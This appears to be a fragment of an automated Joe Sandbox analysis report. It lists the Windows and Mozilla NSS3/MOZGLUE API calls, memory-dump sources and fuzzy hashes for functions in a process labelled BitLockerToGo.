                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB25B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB25B56
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB22D9C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CB22DB2
                                                                                                                                                                                                                                                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CB22DCF
                                                                                                                                                                                                                                                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CB22DF2
                                                                                                                                                                                                                                                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CB22E0B
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 153d6095da219100a19c4756327157f4581d832cdf8ad56ac95619d2f4abdb2d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D801A5B59102905BEB309E25FC05BDBB7A5EB41368F440535E85D87B10D736F8258693
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CABAE42), ref: 6CAA30AA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAA30C7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CAA30E5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAA3116
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAA312B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: PK11_DestroyObject.NSS3(?,?), ref: 6CAA3154
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAA317E
                                                                                                                                                                                                                                                                                                                    • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CA999FF,?,?,?,?,?,?,?,?,?,6CA92D6B,?), ref: 6CABAE67
                                                                                                                                                                                                                                                                                                                    • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CA999FF,?,?,?,?,?,?,?,?,?,6CA92D6B,?), ref: 6CABAE7E
                                                                                                                                                                                                                                                                                                                    • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CA92D6B,?,?,00000000), ref: 6CABAE89
                                                                                                                                                                                                                                                                                                                    • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CA92D6B,?,?,00000000), ref: 6CABAE96
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CA92D6B,?,?), ref: 6CABAEA3
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 754562246-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 40554e8386ee5784695a16724dee70479c2c9ea1da72c6173ab1c9c7663126ea
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0cef65190d5da41d6437709f6fb30f3d36474497d4d6ba5fb3cb77c6fd746291
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40554e8386ee5784695a16724dee70479c2c9ea1da72c6173ab1c9c7663126ea
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8018176B0507057E60191ADAD85AAB316E8B8765CB080031F90AEBB02F636DDDD46E2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(6CBAA6D8), ref: 6CBAAE0D
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CBAAE14
                                                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(6CBAA6D8), ref: 6CBAAE36
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CBAAE3D
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,00000000,?,?,6CBAA6D8), ref: 6CBAAE47
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 682657753-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: bbc405c7ce6882ec95cda8fb4cfaad33f2aa0f25570938e5f88fcd7f159e6abf
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 22b727db1896211446741404c43edd33a62c09a701ec3f0b34a18ed200d34279
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbc405c7ce6882ec95cda8fb4cfaad33f2aa0f25570938e5f88fcd7f159e6abf
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBF09C7610160557CA10AFA4E4089577B7CFF4DBB57240328E57A83940D731E116CFD5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: GetCurrentProcess.KERNEL32(?,6C9731A7), ref: 6C9ACBF1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9731A7), ref: 6C9ACBFA
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D4F2
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D50B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97CFE0: EnterCriticalSection.KERNEL32(6C9FE784), ref: 6C97CFF6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97CFE0: LeaveCriticalSection.KERNEL32(6C9FE784), ref: 6C97D026
                                                                                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D52E
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE7DC), ref: 6C99D690
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D751
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                                                    • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b942c921620e646127782654a3c1691ae450ba77b64710d5016c4dbab84580e8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2e7e0db84fb3f9837b98ad5794626d567614efca4220aad113658b020a4eec21
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b942c921620e646127782654a3c1691ae450ba77b64710d5016c4dbab84580e8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E51E372A087058FD314CF28C0D075AB7F5EB89708F28492ED5AAC7B84D771E801CB92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C974290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9B3EBD,6C9B3EBD,00000000), ref: 6C9742A9
                                                                                                                                                                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C9CB127), ref: 6C9CB463
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9CB4C9
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C9CB4E4
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                                                                                    • String ID: pid:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 149fa344ed1f20dbe613dc2110048e288ea270a3214ca82d7a6d7d78437e3d7d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a2d6aa3c8c2bda6ff5f6423b1de76d950660fe7b75ce8aa85677af645214f81
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 149fa344ed1f20dbe613dc2110048e288ea270a3214ca82d7a6d7d78437e3d7d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6311031B05208DBDB10DFA9D880AEEB7B9BF15318F580529D91167A41D736E849CBE3
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CA26D36
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • database corruption, xrefs: 6CA26D2A
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CA26D2F
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA26D20
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                    • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 45492318a9074b4d5b3f4a83b401de1c0e0f8e4a60319f4ad20dc004e4f82576
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3eb87a7bb639d53faa188232a7a5c976e2c9d37babe7098fd0e18ed901c86ba0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45492318a9074b4d5b3f4a83b401de1c0e0f8e4a60319f4ad20dc004e4f82576
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE213330604B199BC710CE1AC941B5AB7F6AF80318F28852CD8499BF51E374F9C9CB92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB5CC7B), ref: 6CB5CD7A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB5CD8E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB5CDA5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB5CDB8
                                                                                                                                                                                                                                                                                                                    • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CB5CCB5
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(6CBF14F4,6CBF02AC,00000090), ref: 6CB5CCD3
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(6CBF1588,6CBF02AC,00000090), ref: 6CB5CD2B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA79AC0: socket.WSOCK32(?,00000017,6CA799BE), ref: 6CA79AE6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA79AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CA799BE), ref: 6CA79AFC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA80590: closesocket.WSOCK32(6CA79A8F,?,?,6CA79A8F,00000000), ref: 6CA80597
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                                                                    • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                                                                    • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                                                                                    • Opcode ID: cfa92acc2d852307a02d04a7d90d6d63fa433fd679e69393210d256aaacaa7d1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a21dec88f2b5254a7e3f886b7619dbccf6e4dae3314e4fb9edd22136d19858e9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfa92acc2d852307a02d04a7d90d6d63fa433fd679e69393210d256aaacaa7d1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E1196F5B042C05FDB019FAAAC067567AB8D356318F181829E46ACFF41E771CC498BE2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9C0CD5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9AF9A7
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9C0D40
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C9C0DCB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C995EDB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: memset.VCRUNTIME140(6C9D7765,000000E5,55CCCCCC), ref: 6C995F27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: LeaveCriticalSection.KERNEL32(?), ref: 6C995FB2
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C9C0DDD
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C9C0DF2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4069420150-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f2d4750cf7124fbe3b5fdba98d5f896dbe4dff6972a17978fb90908f46b8c0c5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5c60e7d446cc6e3487f48c12ed59ea9d03e078acd80975e5fc5895631fff4727
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2d4750cf7124fbe3b5fdba98d5f896dbe4dff6972a17978fb90908f46b8c0c5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A4106B1A087809BD320CF29C04079AFBE5BFA9754F109A2EE8E887710D770D545CB83
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CCDA4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: malloc.MOZGLUE(?), ref: 6C98CA26
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9CD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C9CCDBA,00100000,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CD158
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9CD130: InitializeConditionVariable.KERNEL32(00000098,?,6C9CCDBA,00100000,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CD177
                                                                                                                                                                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CCDC4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C7480: ReleaseSRWLockExclusive.KERNEL32(?,6C9D15FC,?,?,?,?,6C9D15FC,?), ref: 6C9C74EB
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CCECC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: mozalloc_abort.MOZGLUE(?), ref: 6C98CAA2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9BCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C9CCEEA,?,?,?,?,00000000,?,6C9BDA31,00100000,?,?,00000000), ref: 6C9BCB57
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9BCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C9BCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C9CCEEA,?,?), ref: 6C9BCBAF
                                                                                                                                                                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CD058
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 861561044-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C995D40
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FF688), ref: 6C995D67
                                                                                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C995DB4
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FF688), ref: 6C995DED
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 557828605-0
                                                                                                                                                                                                                                                                                                                    APIs
